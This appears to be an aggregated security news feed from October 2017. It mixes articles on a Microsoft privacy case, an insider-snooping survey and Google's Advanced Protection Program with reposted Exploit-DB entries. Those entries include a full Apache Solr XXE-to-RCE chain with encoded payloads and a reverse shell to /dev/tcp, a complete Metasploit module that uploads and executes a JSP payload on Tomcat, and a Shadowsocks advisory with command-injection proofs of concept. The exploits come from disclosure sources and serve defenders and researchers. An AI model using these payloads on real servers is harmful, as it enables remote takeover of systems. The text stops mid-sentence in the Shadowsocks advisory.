CVE-2015-7806

CVE-2015-7806

http://ift.tt/2ywHfwZ

References to Advisories, Solutions, and Tools

By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because
they may have information that would be of interest to you. No inferences should be drawn on account of other sites
being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose.
NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further,
NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about
this page to nvd@nist.gov.

Technical Details

Vulnerability Type
(View All)

Security News

via National Vulnerability Database http://ift.tt/OD63ZH

October 17, 2017 at 02:24PM

Supreme Court Will Hear U.S Vs Microsoft Privacy Case

Supreme Court Will Hear U.S Vs Microsoft Privacy Case

http://ift.tt/2yrrJ3n

World Will Watch the U.S. Government Vs Microsoft Played Out in the Supreme Court

The continuing battle between the U.S. government and Microsoft over access to private emails stored in Ireland is going to the Supreme Court. The case was accepted by the Supreme Court on Monday.

It began in 2013 when the government served a search warrant on Microsoft, seeking emails it believed would help in the prosecution of a drugs-trafficking case. Microsoft handed over relevant information stored in America, but declined to deliver emails stored in Ireland. It argued overreach, claiming that a search warrant could only apply within U.S. borders.

The government went to court to force Microsoft to comply. At first its warrant was upheld, but Microsoft appealed and the U.S. Court of Appeals for the 2nd Circuit subsequently overturned the ruling.

The basic arguments are relatively simple. The government contends that an inability to access evidence pertaining to U.S. means that “hundreds if not thousands of investigations of crimes — ranging from terrorism, to child pornography, to fraud — are being or will be hampered by the government’s inability to obtain electronic evidence.” It holds that the warrant is valid because the actual search would be conducted in the U.S.

Microsoft contends that the relevant law, the Stored Communications Act of 1986, was written in an age that had no concept of private emails being stored in different locations across the globe. But it also claims there are wider issues to consider. “If U.S. law enforcement can obtain the emails of foreigners stored outside the United States,” wrote http://ift.tt/2x3u5Ek… Microsoft’s president and chief legal officer Brad Smith in a blog post yesterday, “what’s to stop the government of another country from getting your emails even though they are located in the United States?”

The current laws were written for the era of the floppy disk, he added, “not the world of the cloud. We believe that rather than arguing over an old law in court, it is time for Congress to act by passing new legislation, such as the International Communications Privacy Act (ICPA) of 2017.”

Writing http://ift.tt/2x3nFF0… in the Volokh Conspiracy blog yesterday, George Washington University law professor Orin Kerr points out that it is unusual for the Supreme Court to hear a case without lower court split. “It’s typical for the justices to wait for lower courts to divide on an issue before they will step in,” he wrote. “Relying on splits uses lower-court disagreement as a signal for the kind of difficult and important issues that the justices need to resolve.” It is, he suggests, “a recognition among the justices of the tremendous importance of digital evidence collection. Whatever the right answers are, the justices need to provide them.”

While the drama is being played out on the U.S. legal stage, it is being watched closely around the world — and no more so than in Europe. Europe has a different attitude towards privacy than the U.S., typified first in the European Data Privacy Directive, and now in the European General Data Protection Regulation (GDPR http://ift.tt/2xz40jX ). Both require that European personal data should not be exported to a location with lower privacy protections in Europe. The U.S. is considered one such location.

To get round this potential impasse, Europe and the U.S. developed a Safe Harbor arrangement to allow American companies to export European data to servers in America; but this was thrown out http://ift.tt/2x2Z1V8… by the European Court of Justice (the EU’s equivalent to the Supreme Court) in September 2015. The primary reason was unfettered access to personal data by the U.S. government. 

Since then the two governments have developed Privacy Shield as a stronger replacement for Safe Harbor — but Privacy Shield http://ift.tt/2x2gJbp… has not yet been tested in the courts. Europe’s reaction to the US government’s potential ability to unilaterally extract European data from within Europe will test Privacy Shield to the limits.

“In a keenly watched case,” summarizes Robert Cattanach, a partner at the international law firm Dorsey & Whitney, “the US Supreme Court has agreed to review a decision by the Second Circuit Court of Appeals that Microsoft did not have to turn over user data stored overseas in response to a search warrant issued under the Stored Communication Act. The case pits the interests of law enforcement access to information against concerns over government overreach, and could have ramifications globally as other nations likely will adapt their policies regarding access to information stored in other countries based on what the US Supreme Court decides. Privacy advocates have decried the prospect of borderless search authority by governments across the world, while law enforcement have painted the specter of criminal activities being shielded by convenient placement of data. All of this is being played out as the European Union continues its review of the Privacy Shield measure that allows the transfer of personal data of EU residents to the US under the presumption that it can be adequately protected.”

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Previous Columns by Kevin Townsend:

Tags:

Security News

via SecurityWeek RSS Feed http://ift.tt/T5XpCH

October 17, 2017 at 02:17PM

Security Pros Admit Snooping on Corporate Network: Survey

Security Pros Admit Snooping on Corporate Network: Survey

http://ift.tt/2yup60G

IT security professionals, particularly executives, often access information that is not relevant to their day-to-day work, according to a new One Identity study focusing on “snooping” on the corporate network.

Dimensional Research polled more than 900 IT security professionals on behalf of One Identity. The respondents were from various types of companies in the United States, the United Kingdom, Germany, France, Australia, Singapore and Hong Kong, with at least 500 employees.

When asked if their company’s employees ever attempt to access information that is not necessary for their day-to-day work, 92% admitted it happens and 23% said it happens frequently. There are no major differences based on region or the size of the company.

Roughly two-thirds of the IT security pros that took part in the survey admitted snooping themselves, although 51% claim they do it rarely. Professionals from the U.S. seem to snoop the least (50%) while ones in Germany snoop the most (80%).

Interestingly, executives appear to be the guiltiest (71% said they snoop), followed by managers (68%) and other members of the IT security team (56%).

Globally, one in three IT security professionals who took part in the survey said they had accessed sensitive information about their company’s performance, despite not being required to do so as part of their job. This behavior can be seen more in Europe and Asia, and less in the U.S. and Australia, the report shows.

Again, executives and managers are more likely to look at company performance data compared to non-managers.

Snooping based on company size and job role

The survey also found that cybersecurity professionals working in the technology sector are most likely to look for data on their organization’s performance.

“While insider threats tend to be non-malicious in intent, our research depicts a widespread, intrusive meddling from employees when it comes to information that falls outside their responsibility — and it could be that meddling that ends up putting their employers in hot water,” explained John Milburn, president and general manager of One Identity.

“Without proper governance of access permissions and rights, organizations give employees free reign to move about the enterprise and access sensitive information like financial performance data, confidential customer documentation, or a CEO’s personal files. If that information winds up in the wrong hands, corporate data loss, customer data exposure or compliance violations are possible risks that could result in irreversible damage to the business’s reputation or financial standing,” Milburn added.

Related: Psycho-Analytics Could Aid Insider Threat Detection

Related: Alarming Percentage of Employees Hide Security Incidents

Related: One in Five Employees Would Sell Work Passwords

Eduard Kovacs is an international correspondent for SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Previous Columns by Eduard Kovacs:

Tags:

Security News

via SecurityWeek RSS Feed http://ift.tt/T5XpCH

October 17, 2017 at 02:17PM

Google Advanced Protection Program protects high-risk users from hacks

Google Advanced Protection Program protects high-risk users from hacks

http://ift.tt/2kW81Kd

Instead of focusing on all users, Google set its sights on the minority who need the strongest security measures and today announced the launch of its Advanced Protection Program. The program goes beyond two-step verification by requiring a physical piece of hardware as a key to access your Gmail and other Google accounts; those who enroll will be trading convenience for added security.

Google rolled out the new security measure for the minority of its users who are at an elevated risk of cyberattack. In the company’s words:

We took this unusual step because there is an overlooked minority of our users that are at particularly high risk of targeted online attacks. For example, these might be campaign staffers preparing for an upcoming election, journalists who need to protect the confidentiality of their sources, or people in abusive relationships seeking safety. Sometimes even the most careful and security-minded users are successfully attacked through phishing scams, especially if those phishing scams were individually targeted at the user in question.

If you have a personal Google Account, you can enroll using Chrome — and only Chrome, at least for now, as it supports the U2F standard and has done so since 2014. After enrolling, Google promises to “always use the strongest defenses that Google has to offer” and to “continually update” those security measures.

[ Read reviews of today’s top security tools and bookmark CSO’s daily dashboard for the latest advisories and headlines. | Sign up for CSO newsletters. ]

How to use Google Advanced Protection

To use Google Advanced Protection, you will need two Universal 2nd Factor (U2F) security keys, which have been approved by the FIDO Alliance. That means you will need a U2F USB key for your computer and one that can authenticate over Bluetooth for your mobile devices — phone, table and laptop. For example, Google suggests purchasing a Yubico FIDO U2F security key and a Feitian MultiPass FIDO security key. Once you have two U2F keys approved by the FIDO Alliance, you can turn on Advanced Protection.

Once Advanced Protection is on, your Google life will change. 2FA verification codes sent to your phone and the Google Authenticator app will no longer grant access to your account. If you accidentally fall for a phishing scam and enter your password, the attacker or social engineer can’t get into your account without the U2F keys.

If an attacker tries impersonation and uses the “forgot password” route, there are added steps for an Advanced Protection user to verify his or her identity. Google doesn’t specify what those extra steps will be other than “additional reviews and requests for more details about why you’ve lost access to your account.”

Furthermore, “if you ever lose access to your account and both of your Security Keys, these added verification requirements will take a few days to restore access to your account.”

Additionally, to prevent third-party malicious apps from gaining access your account, Google will automatically limit access to your Gmail and Drive to specific apps — especially its own for now. If you want to access your Gmail, then you have to use Chrome or the Gmail app. You will also have to use Chrome if you want to access your Photos or other signed-in Google services.

Personalized Google Security Checkup

To celebrate Cybersecurity Awareness Month, Google said it intends to launch a series of security announcements this week.

Yesterday, Google announced the launch of its revamped Security Checkup, which provides “personalized guidance to help you improve the security of your account.” Hopefully, you will see a green check mark next to each item in the list. If not, then you need to take care of the items marked with yellow or red exclamation points. The new and improved Security Checkup will evolve as new threats arise.

Google is also testing new predictive phishing protections in Chrome. If you input your Google password into a suspected phishing site, you might see a warning that states something similar like this: “This site may have just stolen your password.”

The company added, “We plan to expand predictive phishing protection to all other passwords you’ve saved in Chrome’s password manager, and [we plan to] enable other apps and browsers that use Safe Browsing technology, like Safari, Firefox and Snapchat, to use it as well.”

Security News

via CSO Online http://ift.tt/2gDzvif

October 17, 2017 at 02:10PM

[webapps] Apache Solr 7.0.1 – XML External Entity Expansion / Remote Code Execution

[webapps] Apache Solr 7.0.1 – XML External Entity Expansion / Remote Code Execution

http://ift.tt/2xMSpie

First Vulnerability: XML External Entity Expansion (deftype=xmlparser) 

Lucene includes a query parser that is able to create the full-spectrum of Lucene queries, using an XML data structure. Starting from version 5.1 Solr supports "xml" query parser in the search query.

The problem is that lucene xml parser does not explicitly prohibit doctype declaration and expansion of external entities. It is possible to include special entities in the xml document, that point to external files (via file://) or external urls (via http://):

Example usage: http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://ift.tt/2yx8kQU"'><a></a>'}

When Solr is parsing this request, it makes a HTTP request to http://ift.tt/2yx8kQU and treats its content as DOCTYPE definition. 

Considering that we can define parser type in the search query, which is very often comes from untrusted user input, e.g. search fields on websites. It allows to an external attacker to make arbitrary HTTP requests to the local SOLR instance and to bypass all firewall restrictions.

For example, this vulnerability could be user to send malicious data to the '/upload' handler:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://ift.tt/2yxzmaP{"xx":"yy"}&commit=true"'><a></a>'}

This vulnerability can also be exploited as Blind XXE using ftp wrapper in order to read arbitrary local files from the solrserver.

Vulnerable code location:
/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java

static Document parseXML(InputStream pXmlFile) throws ParserException {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = null;
    try {
      db = dbf.newDocumentBuilder();
    }
    catch (Exception se) {
      throw new ParserException("XML Parser configuration error", se);
    }
    org.w3c.dom.Document doc = null;
    try {
      doc = db.parse(pXmlFile);
    }
  

Steps to reproduce:

1. Set up a listener on any port by using netcat command "nc -lv 4444"
2. Open http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'}
3. You will see a request from the Solr server on your netcat listener. It proves that the DOCTYPE declaration is resolved.


Remediation suggestions:

Consider adding the following lines to /solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java:

static Document parseXML(InputStream pXmlFile) throws ParserException {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = null;
    try {
      //protect from XXE attacks
      dbf.setFeature("http://ift.tt/1pbdJzG", true);
      dbf.setFeature("http://ift.tt/1gFjapv", false);
      dbf.setFeature("http://ift.tt/1pbdLra", false);
      
      db = dbf.newDocumentBuilder();
    }
    catch (Exception se) {
      throw new ParserException("XML Parser configuration error", se);
    }
    org.w3c.dom.Document doc = null;
    try {
      doc = db.parse(pXmlFile);
    }
  
Links:
http://ift.tt/Z2O0zd
http://ift.tt/1XxbpDk

CVSS v2 base score: 9.0
(AV:N/AC:L/Au:N/C:C/I:P/A:P)

Second Vulnerability: Remote Code Execution (add-listener: RunExecutableListener)

Solr "RunExecutableListener" class can be used to execute arbitrary commands on specific events, for example after each update query. The problem is that such listener can be enabled with any parameters just by using Config API with add-listener command.

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 198

{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"ANYCOMMAND",
    "dir":"/usr/bin/",
    "args":["ANYARGS"]
  }
}

Parameters "exe", "args" and "dir" can be crafted throught the HTTP request during modification of the collection's config. This means that anybody who can send a HTTP request to Solr API is able to execute arbitrary shell commands when "postCommit" event is fired. It leads to execution of arbitrary remote code for a remote attacker.

Steps to reproduce:

Step 1. Create a new collection:

http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2

Step 2. Set up a listener on any port by using netcat command "nc -lv 4444"

Step 3. Add a new RunExecutableListener listener for the collection where "exe" attribute contents the name of running command ("/usr/bin/curl") and "args" attribute contents "http://localhost:4444/executed" value to make a request to the attacker's netcat listener:

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 198

{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"curl",
    "dir":"/usr/bin/",
    "args":["http://localhost:4444/executed"]
  }
}

Step 4. Update "newcollection" to trigger execution of RunExecutableListener: 

POST /solr/newcollection/update HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 19

[{"id":"test"}]

Step 5. You will see a request from the Solr server on your netcat listener. It proves that the curl command is executed on the server.


CVSS v2 base score: 10.0
(AV:N/AC:L/Au:N/C:C/I:C/A:C)

Summary:

By chaining these two vulnerabilities, an external attacker can achieve remote code execution even without direct access to the Solr server. The only requirement is that the attacker should be able to specify a part of query that comes to "q"
search parameter (which is a case for many web applications who use solr).

Lets say that we have an attacker who can only send search queries ("q" param) to a "/select" solr endpoint.
Here is the complete exploit scenario:

Step 1. Create New collection via XXE. This step may be skipped if the attacker already knows any collection name.

http://localhost:8983/solr/gettingstarted/select?q=%20%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%61%64%6d%69%6e%2f%63%6f%6c%6c%65%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%3d%43%52%45%41%54%45%26%6e%61%6d%65%3d%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%26%6e%75%6d%53%68%61%72%64%73%3d%32%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20

Without URL encode:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2"><a></a>'}

Step 2. Set up a netcat listener "nc -lv 4444"

Step 3. Add a new RunExecutableListener listener via XXE

http://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%73%65%6c%65%63%74%3f%71%3d%78%78%78%26%71%74%3d%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%63%6f%6e%66%69%67%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%32%35%37%62%25%32%35%32%32%25%32%35%36%31%25%32%35%36%34%25%32%35%36%34%25%32%35%32%64%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%37%62%25%32%35%32%32%25%32%35%36%35%25%32%35%37%36%25%32%35%36%35%25%32%35%36%65%25%32%35%37%34%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%30%25%32%35%36%66%25%32%35%37%33%25%32%35%37%34%25%32%35%34%33%25%32%35%36%66%25%32%35%36%64%25%32%35%36%64%25%32%35%36%39%25%32%35%37%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%65%25%32%35%36%31%25%32%35%36%64%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%36%65%25%32%35%36%35%25%32%35%37%37%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%33%25%32%35%36%63%25%32%35%36%31%25%32%35%37%33%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%66%25%32%35%36%63%25%32%35%37%32%25%32%35%32%65%25%32%35%35%32%25%32%35%37%35%25%32%35%36%65%25%32%35%34%35%25%32%35%37%38%25%32%35%36%35%25%32%35%36%33%25%32%35%37%35%25%32%35%37%34%25%32%35%36%31%25%32%35%36%32%25%32%35%36%63%25%32%35%36%35%25%32%35%34%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%37%38%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%34%25%32%35%36%39%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%31%25%32%35%37%32%25%32%35%36%37%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%35%62%25%32%35%32%32%25%32%35%32%64%25%32%35%36%33%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%34%25%32%35%34%30%25%32%35%37%63%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%65%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%36%33%25%32%35%36%38%25%32%35%36%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%36%32%25%32%35%36%31%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%64%25%32%35%36%39%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%65%25%32%35%32%36%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%34%25%32%35%36%35%25%32%35%37%36%25%32%35%32%66%25%32%35%37%34%25%32%35%36%33%25%32%35%37%30%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%37%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%31%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%33%25%32%35%33%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%30%25%32%35%33%65%25%32%35%32%36%25%32%35%33%31%25%32%35%32%32%25%32%35%35%64%25%32%35%37%64%25%32%35%37%64%26%73%68%61%72%64%73%3d%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%22%3e%3c%61%3e%3c%2f%61%3e%27%7d

Without URL encode:

http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/select?q=xxx&qt=/solr/newcollection/config?stream.body={"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","$@|sh",".","echo","/bin/bash","-i",">&","/dev/tcp/127.0.0.1/1234","0>&1"]}}&shards=localhost:8983/"><a></a>'}

As you may notice, in order to update the config we need to send a POST request to the application. But by using XXE vulnerability we can only send HTTP GET requests. There is a special trick is used here: If Solr receives "/select?q=123&qt=/xxx&shards=localhost:8983/" GET request, it actually converts it to POST and redirects this request to the shard specified in "shards" parameter. Which is also cool, it overwrites url query by the "qt" parameter, so we can convert it from "/select" to "/config". 
The result HTTP request that is landed to localhost:8983/ will be POST request with stream.body="our_value". That is exactly what we need in terms of exploitation.

Step 3. Update "newcollection" through XXE to trigger execution of RunExecutableListener

http://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%75%70%64%61%74%65%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%35%62%25%37%62%25%32%32%25%36%39%25%36%34%25%32%32%25%33%61%25%32%32%25%34%31%25%34%31%25%34%31%25%32%32%25%37%64%25%35%64%26%63%6f%6d%6d%69%74%3d%74%72%75%65%26%6f%76%65%72%77%72%69%74%65%3d%74%72%75%65%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20

Without URL encode:

http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/update?stream.body=[{"id":"AAA"}]&commit=true&overwrite=true"><a></a>'} 

Step 5. When the "/bin/sh c $@|sh . echo /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1" command is executed during update, a new shell session will be opened on the netcat listener. An attacker can execute any shell command on the server where Solr is running.


In all three requests Solr responds with different errors, but all of these error are happened after desired actions are executed.

All these vulnerabilities were tested on the latest version of Apache Solr with the default cloud config (bin/solr start -e cloud -noprompt)

These vulnerabilities were discovered by:
Michael Stepankin (JPMorgan Chase)
Olga Barinova (Gotham Digital Science)

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM

[remote] Tomcat – Remote Code Execution via JSP Upload Bypass (Metasploit)

[remote] Tomcat – Remote Code Execution via JSP Upload Bypass (Metasploit)

http://ift.tt/2kWDPOR

##
# This module requires Metasploit: http://ift.tt/1bnzWGZ
# Current source: http://ift.tt/1iQz0Mp
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tomcat RCE via JSP Upload Bypass',
      'Description'    => %q{
        This module uploads a jsp payload and executes it.
      },
      'Author'      => 'peewpw',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-12617' ],
          [ 'URL', 'http://ift.tt/2xkGJhn' ],
          [ 'URL', 'http://ift.tt/2yd6eSv' ]
        ],
      'Privileged'     => false,
      'Platform'    => %w{ linux win }, # others?
      'Targets'     =>
        [
          [ 'Automatic',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ],
          [ 'Java Windows',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ],
          [ 'Java Linux',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'linux'
            }
          ]
        ],
      'DisclosureDate' => 'Oct 03 2017',
      'DefaultTarget'  => 0))

    register_options([
        OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]),
        Opt::RPORT(8080)
      ])
  end

  def check
    testurl = Rex::Text::rand_text_alpha(10)
    testcontent = Rex::Text::rand_text_alpha(10)

    send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method'    => 'PUT',
      'data'      => "<% out.println(\"#{testcontent}\");%>"
    })

    res1 = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp"),
      'method'    => 'GET'
    })

    if res1 && res1.body.include?(testcontent)
      send_request_cgi(
        opts = {
          'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
          'method'    => 'DELETE'
        },
        timeout = 1
      )
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Uploading payload...")
    testurl = Rex::Text::rand_text_alpha(10)

    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method'    => 'PUT',
      'data'      => payload.encoded
    })
    if res && res.code == 201
      res1 = send_request_cgi({
        'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp"),
        'method'    => 'GET'
      })
      if res1 && res1.code == 200
        print_status("Payload executed!")
      else
        fail_with(Failure::PayloadFailed, "Failed to execute the payload")
      end
    else
      fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
    end
  end

end

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM

[local] Shadowsocks – Log File Command Execution

[local] Shadowsocks – Log File Command Execution

http://ift.tt/2xNCpwi

X41 D-Sec GmbH Security Advisory: X41-2017-008

Multiple Vulnerabilities in Shadowsocks
=======================================

Overview
--------
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vendor: Shadowsocks
Vendor URL: http://ift.tt/1l5mEFl
Vector: Network
Credit: X41 D-Sec GmbH, Niklas Abel
Status: Public
Advisory-URL:
http://ift.tt/2g8fKiP


Summary and Impact
------------------
Several issues have been identified, which allow attackers to manipulate
log files, execute commands and to brute force Shadowsocks with enabled
autoban.py brute force detection. Brute force detection from autoban.py
does not work with suggested tail command. The key of captured
Shadowsocks traffic can be brute forced.


Product Description
-------------------
Shadowsocks is a fast tunnel proxy that helps you bypass firewalls.



Log file manipulation
=====================
Severity Rating: Medium
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vector: Network
CVE: not yet issued
CWE: 117
CVSS Score: 4.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Summary and Impact
------------------
Log file manipulation is possible with a manipulated hostname, sent to
the server from a client, even if Shadowsocks is as quiet as possible
with "-qq".

Therefore a string like "\nI could be any log entry\n" could be sent as
hostname to Shadowsocks. The server would log an additional line with
"I could be any log entry".


Workarounds
-----------
There is no workaround available, do not trust the logfiles until a
patch is released.



Command Execution
=================
Severity Rating: Critical
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vector: Network
CVE: not yet issued
CWE: 78
CVSS Score: 9.0
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H


Summary and Impact
------------------
When the brute force detection with autoban.py is enabled, remote
attackers are able to execute arbitrary commands.

Command execution is possible because of because of line 53 "os.system(cmd)"
in autoban.py, which executes "cmd = 'iptables -A INPUT -s %s -j DROP' %
ip". The "ip" parameter gets parsed from the log file, whose contents
can be controlled by a third party sending unauthenticated packets.


Proof of Concept
----------------
When, a string like "can not parse header when ||ls&:\n" is sent as host
name to Shadowsocks, it would end up in the logfile and lead to the
execution of "ls".
Autoban.py does not execute commands with spaces due to internal
sanitization. A requested hostname like:

" can not parse header when ||ls&:\ntouch /etc/evil.txt\nexit\ncan not
parse header when ||/bin/bash</var/log/shadowsocks.log&:\n" could be
used to work around this limitation. It writes the command "touch
/etc/evil.txt" into the logfile and executes it with
"/bin/bash</var/log/shadowsocks.log".
The exit; command is an important factor, without it an unbounded
recursion would occur leading to a DoS.


Workarounds
-----------
No workaround available, do not use autoban.py.



Lack of Bruteforce detection through autoban.py
===============================================
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A


Summary and Impact
------------------
The brute force detection autoban.py does not work at all with the suggested
tail command, suggested at
http://ift.tt/1BNqZ5q.

The command "python autoban.py < /var/log/shadowsocks.log" does work,
but the suggested "nohup tail -F /var/log/shadowsocks.log | python
autoban.py > log 2>log &" does not block IP's.
The "for line in sys.stdin:" from autoban.py parses the input until
there is an end of file (EOF). As "tail -F" will never pipe an EOF into
the pyhon script, the sys.stdin will block the script forever. So the
"tail -F /var/log/shodowsocks | autoban.py" will never block anything
except itself.

Workarounds
-----------
Use python "autoban.py < /var/log/shadowsocks.log" in a cronjob. Do not
use autoban.py until the command execution issue gets fixed.



Bruteforcable Shadowsocks traffic because of MD5
================================================
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A

Summary and Impact
------------------
Shadowsocks uses no brute force prevention for it's key derivation function.

The key for Shadowsocks traffic encryption is static and derived from
the password, using MD5. The password derivation is in encrypt.py in
line 56 to 63: "

while len(b''.join(m)) < (key_len + iv_len):
        md5 = hashlib.md5()
        data = password
        if i > 0:
            data = m[i - 1] + password
        md5.update(data)
        m.append(md5.digest())
        i += 1
"

MD5 should not be used to generate keys, since it is a hash function.
A proper key derivation function increases the costs for this operation,
